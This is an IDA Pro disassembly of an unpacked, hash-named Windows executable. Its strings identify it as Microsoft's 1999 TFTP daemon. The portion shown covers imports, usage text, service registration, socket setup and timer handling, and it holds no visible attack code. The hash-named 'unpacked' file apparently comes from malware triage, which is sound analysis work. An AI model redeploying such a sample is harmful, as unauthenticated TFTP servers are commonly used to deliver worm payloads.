;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	63889C99761A19F6751FE41C3CD0D54E

; File Name   :	u:\work\63889c99761a19f6751fe41c3cd0d54e_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	1000000
; Section 1. (virtual address 00001000)
; Virtual size			: 00006000 (  24576.)
; Section size in file		: 00006000 (  24576.)
; Offset to raw	data for section: 00001000
; Flags	E0000080: Bss Executable Readable Writable
; Alignment	: default

		include	uni.inc	; see unicode subdir of	ida for	info on	unicode

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
seg000		segment	para public 'CODE' use32
		assume cs:seg000
		;org 1001000h
		assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_1001000	dd 77DD761Bh	; resolved to->ADVAPI32.RegOpenKeyExAdword_1001004	dd 77E37D39h	; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_1001008	dd 77DD7883h	; resolved to->ADVAPI32.RegQueryValueExAdword_100100C	dd 77DD6BF0h	; resolved to->ADVAPI32.RegCloseKeydword_1001010	dd 77DF0953h	; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_1001014	dd 77DEB193h	; resolved to->ADVAPI32.SetServiceStatus					; sub_1001DEB+6Br ...
		dd 0
dword_100101C	dd 7C81CDDAh	; resolved to->KERNEL32.ExitProcessdword_1001020	dd 7C8329D9h	; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_1001024	dd 7C80A7D4h	; resolved to->KERNEL32.GetLocalTimedword_1001028	dd 7C91188Ah	; resolved to->NTDLL.RtlDeleteCriticalSectiondword_100102C	dd 7C910340h	; resolved to->NTDLL.RtlSetLastWin32Error					; sub_1002F31+1C3r ...
dword_1001030	dd 7C80A017h	; resolved to->KERNEL32.SetEventdword_1001034	dd 7C8328F7h	; resolved to->KERNEL32.ResumeThreaddword_1001038	dd 7C910331h	; resolved to->NTDLL.RtlGetLastWin32Error					; sub_1001665:loc_1001762r ...
dword_100103C	dd 7C802520h	; resolved to->KERNEL32.WaitForSingleObject					; sub_1001A91+1ABr
dword_1001040	dd 7C8308ADh	; resolved to->KERNEL32.CreateEventA					; sub_10018DB+B4r ...
dword_1001044	dd 7C809EF1h	; resolved to->KERNEL32.InitializeCriticalSection					; sub_10019F0+14r ...
dword_1001048	dd 7C812BB6h	; resolved to->KERNEL32.HeapCreatedword_100104C	dd 7C9010EDh	; resolved to->NTDLL.RtlLeaveCriticalSection					; sub_1001A91+B5r ...
dword_1001050	dd 7C91043Dh	; resolved to->NTDLL.RtlFreeHeapdword_1001054	dd 7C809B47h	; resolved to->KERNEL32.CloseHandle					; sub_1001E73+9Er ...
dword_1001058	dd 7C901005h	; resolved to->NTDLL.RtlEnterCriticalSection					; sub_1001A91+4Er ...
dword_100105C	dd 7C809766h, 7C80A05Dh, 7C9105D4h, 7C80A03Bh; resolved to->KERNEL32.InterlockedIncrement					; sub_1001A91+2C1r ...
dword_100106C	dd 7C802442h	; resolved to->KERNEL32.Sleep					; sub_100205A+4Er
dword_1001070	dd 7C90112Bh	; resolved to->NTDLL.RtlTryEnterCriticalSectiondword_1001074	dd 7C839732h	; resolved to->KERNEL32.SuspendThread		dd 0
dword_100107C	dd 77C39D67h	; resolved to->MSVCRT._inittermdword_1001080	dd 77C1EEEBh	; resolved to->MSVCRT.__getmainargsdword_1001084	dd 77C4D675h	; resolved to->MSVCRT.__setusermatherrdword_1001088	dd 77C2EFB0h	; resolved to->MSVCRT._lseekdword_100108C	dd 77C2D0D7h	; resolved to->MSVCRT._closedword_1001090	dd 77C2FAA3h	; resolved to->MSVCRT._readdword_1001094	dd 77C2C407h	; resolved to->MSVCRT.malloc					; sub_100205A+93r ...
dword_1001098	dd 77C2C437h	; resolved to->MSVCRT.reallocdword_100109C	dd 77C40AB1h	; resolved to->MSVCRT.fclosedword_10010A0	dd 77C2C21Bh	; resolved to->MSVCRT.free					; sub_1001F54+47r ...
dword_10010A4	dd 77C4AEA3h	; resolved to->MSVCRT.time					; sub_1001DEB+8r
dword_10010A8	dd 77C1F3A5h	; resolved to->MSVCRT._chdirdword_10010AC	dd 77C1F2BCh	; resolved to->MSVCRT._errno					; sub_10027E1+77r ...
; ---------------------------------------------------------------------------


loc_10010B0:				; DATA XREF: sub_1001665+1AEr
		daa
		clc
		sal	dword ptr [edi+10h], 0F0h ; DATA XREF: sub_1001665+1DBr
		retn
; ---------------------------------------------------------------------------
		db 77h
dword_10010B8	dd 77C4A9F1h	; resolved to->MSVCRT.ctime					; sub_1001DEB+19r
dword_10010BC	dd 77C4EE2Fh	; resolved to->MSVCRT._controlfp; ---------------------------------------------------------------------------


loc_10010C0:				; DATA XREF: seg000:loc_1003BF0r
		xchg	eax, esp
		pop	esp
		retn
; ---------------------------------------------------------------------------
		db 77h
dword_10010C4	dd 77C3537Ch	; resolved to->MSVCRT.__set_app_typedword_10010C8	dd 77C1F1DBh	; resolved to->MSVCRT.__p__fmodedword_10010CC	dd 77C1F1A4h	; resolved to->MSVCRT.__p__commodedword_10010D0	dd 77C623D8h	; resolved to->MSVCRT._adjust_fdivdword_10010D4	dd 77C4186Ah	; resolved to->MSVCRT.printfdword_10010D8	dd 77C1F1F1h	; resolved to->MSVCRT.__p___initenv; ---------------------------------------------------------------------------


loc_10010DC:				; DATA XREF: sub_1003BA0r
		scasb
		sub	eax, 9E9A77C3h	; DATA XREF: seg000:01003B7Ar
		retn
; ---------------------------------------------------------------------------
		db 77h
dword_10010E4	dd 77C2F566h	; resolved to->MSVCRT._open					; sub_100333A+1B9r
dword_10010E8	dd 77C30303h	; resolved to->MSVCRT._writedword_10010EC	dd 77C39E7Eh	; resolved to->MSVCRT.exit					; sub_1001665+C0r ...
		dd 0
dword_10010F4	dd 71AB8769h	; resolved to->WS2_32.WSASocketAdword_10010F8	dd 71AB94DCh	; resolved to->WS2_32.WSAGetLastError					; sub_1001A91+12Br ...
dword_10010FC	dd 71AB664Dh	; resolved to->WS2_32.WSAStartupdword_1001100	dd 71AB4573h	; resolved to->WS2_32.WSAEventSelectdword_1001104	dd 71AB2B66h	; resolved to->WS2_32.ntohs					; sub_100230A+Fr ...
dword_1001108	dd 71AC0D03h	; resolved to->WS2_32.WSAGetOverlappedResultdword_100110C	dd 71AB2B66h	; resolved to->WS2_32.ntohs					; sub_1002A3D+40r ...
dword_1001110	dd 71ABF652h, 71AB4519h; resolved to->WS2_32.WSARecvFrom					; sub_1001A91+2Ar
dword_1001118	dd 71AB4682h	; resolved to->WS2_32.WSACloseEventdword_100111C	dd 71AB9639h	; resolved to->WS2_32.closesocket					; sub_100205A+E7r ...
dword_1001120	dd 71AB3F41h	; resolved to->WS2_32.inet_ntoa					; sub_1002F31+64r ...
dword_1001124	dd 71AB3E00h	; resolved to->WS2_32.bind					; sub_1002F31+256r ...
dword_1001128	dd 71ABE6EBh	; resolved to->WS2_32.getservbynamedword_100112C	dd 71AB3B91h	; resolved to->WS2_32.socket					; sub_100333A+1EBr
dword_1001130	dd 71AB2C69h	; resolved to->WS2_32.sendto					; sub_1002A3D+65r ...
		align 8
dword_1001138	dd 76D66300h	; resolved to->IPHLPAPI.NotifyAddrChangedword_100113C	dd 76D63B9Ch	; resolved to->IPHLPAPI.GetIpAddrTable		dd 0
dword_1001144	dd 7C90253Ah	; resolved to->NTDLL.memmovedword_1001148	dd 7C902C80h	; resolved to->NTDLL.strncpydword_100114C	dd 7C96FB58h	; resolved to->NTDLL.isupperdword_1001150	dd 7C970328h	; resolved to->NTDLL.tolower					; sub_100333A+95r
dword_1001154	dd 7C9383CDh	; resolved to->NTDLL.RtlUpdateTimer					; sub_1002B5E+114r ...
dword_1001158	dd 7C92D707h	; resolved to->NTDLL.RtlDeleteTimer					; sub_1002A3D+FDr ...
dword_100115C	dd 7C913374h	; resolved to->NTDLL._stricmpdword_1001160	dd 7C924C29h	; resolved to->NTDLL.atoi					; sub_10023D8+F2r
dword_1001164	dd 7C92F23Ah	; resolved to->NTDLL._itoadword_1001168	dd 7C92D97Bh	; resolved to->NTDLL.RtlDeregisterWaitEx					; sub_1002901+35r
dword_100116C	dd 7C901A09h	; resolved to->NTDLL._chkstkdword_1001170	dd 7C92EBF8h	; resolved to->NTDLL.RtlCreateTimerQueuedword_1001174	dd 7C9359F3h	; resolved to->NTDLL.RtlRegisterWait					; sub_10018DB+D6r
dword_1001178	dd 7C92DFACh	; resolved to->NTDLL.RtlCreateTimer					; sub_1002F31+34Dr ...
		dd 9 dup(0)
		dd 37ECADD7h, 0
		dd 3, 310h, 0
		dd 4D10h, 0
		dd 37ECADD7h, 0
		dd 6, 2	dup(0)
		dd 5020h, 0
		dd 37ECADD7h, 0
		dd 2, 1Ah, 0
		db 90h
		db 0FEh, 0A7h, 0FFh
aDNtPrivateNetS	db 'D:\nt\private\net\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999'
		db ' 22:17:18',0Ah,0
aOWritableFiles	db ' o writable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+C4o
aWritable	db 'writable',0         ; DATA XREF: sub_1001570+BFo
					; sub_10037BF+121o
		align 4
aOReadableFiles	db ' o Readable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+B6o
aReadable	db 'readable',0         ; DATA XREF: sub_1001570+B1o
					; sub_10037BF+F1o
		align 4
aOValidmastersK	db ' o ValidMasters   keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+A8o
aMasters	db 'masters',0          ; DATA XREF: sub_1001570+A3o
					; sub_10037BF+C1o
aOValidclientsK	db ' o ValidClients   keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+9Ao
aClients	db 'clients',0          ; DATA XREF: sub_1001570+95o
					; sub_10037BF+8Eo
aTheseKeysAreSh	db 'These keys are shell patterns with * and ? (see examples above):',0Ah
					; DATA XREF: sub_1001570+8Do
		db 0
		align 4
aOStartdirector	db ' o StartDirectory keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+84o
aDirectory	db 'directory',0        ; DATA XREF: sub_1001570+7Fo
					; sub_10037BF+5Co
		align 4
aRegistryKeyNam	db 'Registry key names, all strings: HKEY_LOCAL_MACHINE %s',0Ah,0
					; DATA XREF: sub_1001570+76o
aSystemCurrentc	db 'System\CurrentControlSet\Services\tftpd\parameters',0
					; DATA XREF: sub_1001570+71o
					; sub_10037BF+13o
		align 10h
aTftpd_logfileI	db ' TFTPD_LOGFILE     is %s',0Ah ; DATA XREF: sub_1001570+68o
		db 0Ah,0
		align 4
aTftpd_log	db 'tftpd.log',0        ; DATA XREF: sub_1001570+63o
					; sub_1001665+1D6o
		align 4
aTftpd_default_	db ' TFTPD_DEFAULT_DIR is %s',0Ah,0 ; DATA XREF: sub_1001570+5Ao
		align 4
aTftpdroot	db '\tftpdroot\',0      ; DATA XREF: sub_1001570+55o
					; sub_1003910+1Eo
a?		db '-?',0               ; DATA XREF: sub_1001570+10o
		align 4
aA		db 'a+',0               ; DATA XREF: sub_1001665+1D1o
		align 4
aTftp		db 'tftp',0             ; DATA XREF: sub_100205A+31o
		align 10h
aUdp		db 'udp',0              ; DATA XREF: sub_100205A+2Co
aOptionNegotiat	db 'Option negotiation failure',0 ; DATA XREF: seg000:01005CE0o
		align 10h
aNoSuchUser	db 'No such user',0     ; DATA XREF: seg000:01005CDCo
		align 10h
aFileAlreadyExi	db 'File already exists',0 ; DATA XREF: seg000:01005CD8o
aUnknownTransfe	db 'Unknown transfer ID',0 ; DATA XREF: seg000:01005CD4o
aIllegalTftpOpe	db 'Illegal TFTP operation',0 ; DATA XREF: seg000:01005CD0o
		align 10h
aDiskFullOrAllo	db 'Disk full or allocation exceeded',0 ; DATA XREF: seg000:01005CCCo
		align 4
aAccessViolatio	db 'Access violation',0 ; DATA XREF: seg000:01005CC8o
		align 4
aFileNotFound	db 'File not found',0   ; DATA XREF: seg000:01005CC4o
		align 4
aErrorUndefined	db 'Error undefined',0  ; DATA XREF: seg000:off_1005CC0o
aTsize		db 'tsize',0            ; DATA XREF: sub_10023D8:loc_100251Ao
		align 10h
aTimeout_0	db 'timeout',0          ; DATA XREF: sub_10023D8:loc_1002498o
aBlksize	db 'blksize',0          ; DATA XREF: sub_10023D8+4Eo
aTimeout	db 'Timeout',0          ; DATA XREF: sub_1002A3D+D2o
aInsufficientRe	db 'Insufficient resources',0 ; DATA XREF: sub_1002F31:loc_1003197o
					; sub_100333A+201o ...
		align 10h
aFileNameTooLon	db 'File name too long',0 ; DATA XREF: sub_1002F31+195o
					; sub_100333A+1A0o
		align 4
aMalformedFileN	db 'Malformed file name',0 ; DATA XREF: sub_1002F31+139o
					; sub_100333A+159o
aOctet		db 'octet',0            ; DATA XREF: sub_1002F31+D2o
					; sub_100333A:loc_100341Fo
		align 10h
aNetascii	db 'netascii',0         ; DATA XREF: sub_1002F31+9Fo
					; sub_100333A:loc_10033E1o
		align 4
asc_100155C:				; DATA XREF: sub_1003910+7Fo
		unicode	0, <\>,0
dword_1001560	dd 0FFFFFFFFh, 1003B5Eh, 1003B73h, 0
; =============== S U B	R O U T	I N E =======================================



sub_1001570	proc near		; CODE XREF: seg000:01003B4Ap

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		cmp	[esp+arg_0], 1
		push	esi
		jle	loc_1001646
		mov	eax, [esp+4+arg_4]
		mov	esi, offset a?	; "-?"
		mov	eax, [eax+4]


loc_1001588:				; CODE XREF: sub_1001570+34j
		mov	dl, [eax]
		mov	cl, dl
		cmp	dl, [esi]
		jnz	short loc_10015AA
		test	cl, cl
		jz	short loc_10015A6
		mov	dl, [eax+1]
		mov	cl, dl
		cmp	dl, [esi+1]
		jnz	short loc_10015AA
		inc	eax
		inc	eax
		inc	esi
		inc	esi
		test	cl, cl
		jnz	short loc_1001588


loc_10015A6:				; CODE XREF: sub_1001570+22j
		xor	eax, eax
		jmp	short loc_10015AF
; ---------------------------------------------------------------------------


loc_10015AA:				; CODE XREF: sub_1001570+1Ej
					; sub_1001570+2Cj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_10015AF:				; CODE XREF: sub_1001570+38j
		test	eax, eax
		jnz	loc_1001646
		mov	esi, dword_10010D4
		push	offset asc_1005010 ; " ======================================"...
		call	esi ; dword_10010D4
		pop	ecx
		push	offset aTftpdroot ; "\\tftpdroot\\"
		push	offset aTftpd_default_ ; " TFTPD_DEFAULT_DIR is	%s\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aTftpd_log ; "tftpd.log"
		push	offset aTftpd_logfileI ; " TFTPD_LOGFILE     is	%s\n\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
		push	offset aRegistryKeyNam ; "Registry key names, all strings: HKEY_L"...
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aDirectory ; "directory"
		push	offset aOStartdirector ; " o StartDirectory keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aTheseKeysAreSh ; "These	keys are shell patterns	with * an"...
		call	esi ; dword_10010D4
		pop	ecx
		push	offset aClients	; "clients"
		push	offset aOValidclientsK ; " o ValidClients   keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aMasters	; "masters"
		push	offset aOValidmastersK ; " o ValidMasters   keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aReadable ; "readable"
		push	offset aOReadableFiles ; " o Readable files keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aWritable ; "writable"
		push	offset aOWritableFiles ; " o writable files keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	0FFFFFFFFh
		call	dword_10010EC	; exit
		pop	ecx


loc_1001646:				; CODE XREF: sub_1001570+6j
					; sub_1001570+41j
		push	offset off_1005CB0
		call	dword_1001004	; StartServiceCtrlDispatcherA
		test	eax, eax
		jnz	short loc_100165B
		call	dword_1001038	; RtlGetLastWin32Error


loc_100165B:				; CODE XREF: sub_1001570+E3j
		push	0
		call	dword_100101C	; ExitProcess
		pop	esi
		retn
sub_1001570	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001665	proc near		; DATA XREF: seg000:01005CB4o

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		push	ebp
		push	esi
		push	edi
		xor	ebp, ebp
		push	offset sub_1001DEB
		push	offset aTftpd	; "Tftpd"
		mov	dword_1006120, 30h
		mov	dword_1006124, 2
		mov	dword_1006128, ebp
		mov	dword_1006134, 1
		mov	dword_1006138, 4E20h
		mov	dword_100612C, ebp
		mov	dword_1006130, ebp
		call	dword_1001010	; RegisterServiceCtrlHandlerA
		cmp	eax, ebp
		mov	dword_1006044, eax
		jz	loc_1001762
		mov	esi, dword_1001014
		mov	edi, offset dword_1006120
		push	edi
		push	eax
		call	esi ; dword_1001014
		cmp	eax, ebp
		jz	loc_1001762
		mov	ebx, dword_1001040
		push	ebp
		push	ebp
		push	ebp
		push	ebp
		call	ebx ; dword_1001040
		push	ebp
		push	ebp
		push	ebp
		push	ebp
		mov	dword_1005DDC, eax
		call	ebx ; dword_1001040
		cmp	dword_1005DDC, ebp
		mov	dword_1005DE0, eax
		jz	short loc_100171C
		cmp	eax, ebp
		jz	short loc_100171C
		push	offset dword_1006140
		push	101h
		call	dword_10010FC	; WSAStartup
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1001735
		call	dword_10010F8	; WSAGetLastError


loc_100171C:				; CODE XREF: sub_1001665+96j
					; sub_1001665+9Aj ...
		push	1Fh
		call	sub_1001E73
		push	1
		call	dword_10010EC	; exit
		pop	ecx


loc_100172C:				; CODE XREF: sub_1001665+218j
					; sub_1001665+224j
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		retn	8
; ---------------------------------------------------------------------------


loc_1001735:				; CODE XREF: sub_1001665+AFj
		push	edi
		mov	dword_1006124, 4
		push	dword_1006044
		mov	dword_1006128, 7
		mov	dword_1006134, ebp
		mov	dword_1006138, ebp
		call	esi ; dword_1001014
		cmp	eax, ebp
		jnz	short loc_100176A


loc_1001762:				; CODE XREF: sub_1001665+57j
					; sub_1001665+6Ej
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	short loc_100171C
; ---------------------------------------------------------------------------


loc_100176A:				; CODE XREF: sub_1001665+FBj
		push	9
		pop	ecx
		xor	eax, eax
		mov	edx, offset dword_10060C0
		mov	edi, edx
		rep stosd
		push	edx
		call	dword_10010A4	; time
		pop	ecx
		mov	edx, [esp+10h+arg_0]
		dec	edx
		mov	ebx, (offset dword_1005E07+1)
		jz	short loc_10017F3
		mov	eax, [esp+10h+arg_4]
		lea	eax, [eax+edx*4]
		mov	[esp+10h+arg_0], eax


loc_1001797:				; CODE XREF: sub_1001665+18Cj
		mov	eax, [esp+10h+arg_0]
		mov	eax, [eax]
		cmp	byte ptr [eax],	2Dh
		jnz	short loc_10017F3
		movsx	ecx, byte ptr [eax+1]
		sub	ecx, 64h
		jz	short loc_10017C9
		dec	ecx
		jz	short loc_10017BD
		dec	ecx
		jnz	short loc_10017E9
		mov	dword_1005DD8, 1
		jmp	short loc_10017E9
; ---------------------------------------------------------------------------


loc_10017BD:				; CODE XREF: sub_1001665+147j
		mov	dword_1005DD4, 1
		jmp	short loc_10017E9
; ---------------------------------------------------------------------------


loc_10017C9:				; CODE XREF: sub_1001665+144j
		lea	edi, [eax+2]
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb


loc_10017E9:				; CODE XREF: sub_1001665+14Aj
					; sub_1001665+156j ...
		sub	[esp+10h+arg_0], 4
		dec	edx
		cmp	edx, ebp
		ja	short loc_1001797


loc_10017F3:				; CODE XREF: sub_1001665+125j
					; sub_1001665+13Bj
		call	sub_10037BF
		call	sub_1003910
		mov	esi, dword_10010A8
		push	ebx
		call	esi ; dword_10010A8
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jnz	short loc_100182E
		call	dword_10010AC	; _errno
		push	ebx
		call	dword ptr loc_10010B0
		cmp	eax, ebp
		pop	ecx
		jnz	loc_100171C
		push	ebx
		call	esi ; dword_10010A8
		cmp	eax, ebp
		pop	ecx
		jnz	loc_100171C


loc_100182E:				; CODE XREF: sub_1001665+1A5j
		cmp	dword_1005DD8, ebp
		jz	short loc_1001857
		push	offset aA	; "a+"
		push	offset aTftpd_log ; "tftpd.log"
		call	dword ptr loc_10010B2+2
		pop	ecx
		cmp	eax, ebp
		pop	ecx
		mov	dword_1005DD0, eax
		jnz	short loc_1001857
		mov	dword_1005DD8, ebp


loc_1001857:				; CODE XREF: sub_1001665+1CFj
					; sub_1001665+1EAj
		push	offset dword_10060C0
		call	dword_10010B8	; ctime
		pop	ecx
		call	sub_10018DB
		call	sub_10019F0
		push	0FFFFFFFFh
		push	dword_1005DDC
		call	dword_100103C	; WaitForSingleObject
		cmp	eax, ebp
		jz	loc_100172C
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	loc_100172C
sub_1001665	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100188E	proc near		; CODE XREF: sub_100205A+D5p
					; sub_1002F31+2A8p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	3
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	dword_1001100	; WSAEventSelect
		test	eax, eax
		jz	short loc_10018AE
		call	dword_1001038	; RtlGetLastWin32Error
		xor	eax, eax
		jmp	short locret_10018D7
; ---------------------------------------------------------------------------


loc_10018AE:				; CODE XREF: sub_100188E+14j
		test	[ebp+arg_8], 1
		push	0
		push	0FFFFFFFFh
		push	[ebp+arg_0]
		jz	short loc_10018C2
		push	offset loc_1001D74
		jmp	short loc_10018C7
; ---------------------------------------------------------------------------


loc_10018C2:				; CODE XREF: sub_100188E+2Bj
		push	offset loc_1001DDB


loc_10018C7:				; CODE XREF: sub_100188E+32j
		push	[ebp+arg_4]
		lea	eax, [ebp+var_4]
		push	eax
		call	dword_1001174	; RtlRegisterWait
		mov	eax, [ebp+var_4]

locret_10018D7:				; CODE XREF: sub_100188E+1Ej
		leave
		retn	0Ch
sub_100188E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_10018DB	proc near		; CODE XREF: sub_1001665+1FEp

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		push	esi
		mov	esi, dword_1001044
		push	edi
		push	offset dword_1006080
		call	esi ; dword_1001044
		push	offset dword_1006020
		call	esi ; dword_1001044
		mov	eax, offset dword_1006098
		mov	dword_100609C, eax
		mov	dword_1006098, eax
		mov	eax, offset dword_1006038
		mov	dword_100603C, eax
		mov	dword_1006038, eax
		lea	eax, [ebp+var_4]
		push	eax
		call	sub_1001FA6
		xor	esi, esi
		test	eax, eax
		jnz	short loc_1001957
		mov	eax, [ebp+var_4]
		xor	ebx, ebx
		cmp	[eax], esi
		jbe	short loc_100194F
		xor	edi, edi


loc_100192E:				; CODE XREF: sub_10018DB+72j
		mov	ecx, [eax+edi+4]
		cmp	ecx, esi
		jz	short loc_1001947
		cmp	ecx, 100007Fh
		jz	short loc_1001947
		push	ecx
		call	sub_100205A
		mov	eax, [ebp+var_4]


loc_1001947:				; CODE XREF: sub_10018DB+59j
					; sub_10018DB+61j
		inc	ebx
		add	edi, 18h
		cmp	ebx, [eax]
		jb	short loc_100192E


loc_100194F:				; CODE XREF: sub_10018DB+4Fj
		push	eax
		call	dword_10010A0	; free
		pop	ecx


loc_1001957:				; CODE XREF: sub_10018DB+46j
		push	offset dword_10060A0
		call	dword_1001170	; RtlCreateTimerQueue
		cmp	eax, esi
		jnz	loc_10019EB
		mov	eax, 0EA60h
		push	esi
		push	eax
		push	eax
		push	esi
		push	offset sub_10029BA
		push	offset dword_1006048
		push	dword_10060A0
		call	dword_1001178	; RtlCreateTimer
		push	esi
		push	esi
		push	esi
		push	esi
		mov	edi, eax
		call	dword_1001040	; CreateEventA
		cmp	eax, esi
		mov	dword_1005DF8, eax
		jnz	short loc_10019A2
		mov	eax, edi
		jmp	short loc_10019EB
; ---------------------------------------------------------------------------


loc_10019A2:				; CODE XREF: sub_10018DB+C1j
		push	esi
		push	0FFFFFFFFh
		push	esi
		push	offset sub_1002219
		push	eax
		push	offset dword_1005DFC
		call	dword_1001174	; RtlRegisterWait
		cmp	eax, esi
		jnz	short loc_10019EB
		mov	ecx, offset dword_1006100
		xor	eax, eax
		mov	edi, ecx
		push	ecx
		stosd
		stosd
		stosd
		stosd
		stosd
		mov	eax, dword_1005DF8
		push	offset dword_1005E00
		mov	dword_1006110, eax
		call	sub_1003A44	; NotifyAddrChange
		cmp	eax, esi
		jz	short loc_10019E9
		cmp	eax, 3E5h
		jnz	short loc_10019EB


loc_10019E9:				; CODE XREF: sub_10018DB+105j
		xor	eax, eax


loc_10019EB:				; CODE XREF: sub_10018DB+89j
					; sub_10018DB+C5j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_10018DB	endp


; =============== S U B	R O U T	I N E =======================================



sub_10019F0	proc near		; CODE XREF: sub_1001665+203p
		mov	eax, offset dword_1006078
		push	offset dword_1006060
		mov	dword_100607C, eax
		mov	dword_1006078, eax
		call	dword_1001044	; InitializeCriticalSection
		push	0
		push	0EFD1Ch
		push	0
		call	dword_1001048	; HeapCreate
		mov	dword_1005DEC, eax
		retn
sub_10019F0	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001A1F	proc near		; CODE XREF: sub_10029BA+79p
		push	ebx
		push	esi
		mov	ebx, offset dword_1006060
		push	edi
		push	ebx
		xor	esi, esi
		call	dword_1001058	; RtlEnterCriticalSection
		mov	eax, dword_1005DF0
		sub	eax, dword_1005DF4
		cmp	eax, 0Ah
		jbe	short loc_1001A46
		shr	eax, 1
		mov	esi, eax
		jmp	short loc_1001A4E
; ---------------------------------------------------------------------------


loc_1001A46:				; CODE XREF: sub_1001A1F+1Fj
		cmp	eax, 3
		jbe	short loc_1001A4E
		push	2
		pop	esi


loc_1001A4E:				; CODE XREF: sub_1001A1F+25j
					; sub_1001A1F+2Aj
		test	esi, esi
		jbe	short loc_1001A86
		mov	edi, esi


loc_1001A54:				; CODE XREF: sub_1001A1F+65j
		mov	eax, dword_1006078
		mov	esi, eax
		mov	ecx, [eax]
		mov	eax, [eax+4]
		mov	[eax], ecx
		mov	[ecx+4], eax
		push	dword ptr [esi+30h]
		call	dword_1001054	; CloseHandle
		push	esi
		push	0
		push	dword_1005DEC
		call	dword_1001050	; RtlFreeHeap
		dec	dword_1005DF0
		dec	edi
		jnz	short loc_1001A54


loc_1001A86:				; CODE XREF: sub_1001A1F+31j
		push	ebx
		call	dword_100104C	; RtlLeaveCriticalSection
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_1001A1F	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001A91	proc near		; CODE XREF: seg000:01001DCCp
					; seg000:01001DE1p

var_68		= byte ptr -68h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_30		= byte ptr -30h
var_28		= dword	ptr -28h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_10		= byte ptr -10h
var_8		= dword	ptr -8
arg_0		= dword	ptr  4
arg_10		= byte ptr  14h
arg_FF9C	= dword	ptr  0FFA0h
arg_FFA0	= dword	ptr  0FFA4h
arg_FFA4	= dword	ptr  0FFA8h
arg_FFA8	= dword	ptr  0FFACh
arg_FFD4	= dword	ptr  0FFD8h
arg_FFD8	= dword	ptr  0FFDCh
arg_10004	= dword	ptr  10008h

		mov	eax, 10004h
		call	sub_1003A3E	; _chkstk
		push	ebx
		push	ebp
		xor	ebp, ebp
		push	esi
		push	edi
		mov	[esp+10h], ebp
		mov	ebx, offset dword_1006060


loc_1001AAA:				; CODE XREF: sub_1001A91+291j
		lea	eax, [esp+10h+arg_0]
		push	eax
		push	4004667Fh
		push	[esp+18h+arg_10004]
		call	dword_1001110+4
		cmp	eax, ebp
		jnz	loc_1001D27
		cmp	[esp+1Ch+var_8], ebp
		jz	loc_1001D65
		xor	eax, eax
		lea	edi, [esp+1Ch+arg_10]
		stosd
		stosd
		stosd
		stosd
		push	ebx
		stosd
		call	dword_1001058	; RtlEnterCriticalSection
		mov	eax, dword_1006078
		inc	dword_1005DF4
		cmp	eax, offset dword_1006078
		jz	short loc_1001B11
		mov	ecx, [eax]
		mov	esi, eax
		mov	eax, [eax+4]
		mov	[eax], ecx
		mov	[ecx+4], eax
		push	dword ptr [esi+30h]
		call	dword_100105C+0Ch
		mov	eax, [esi+30h]
		jmp	short loc_1001B41
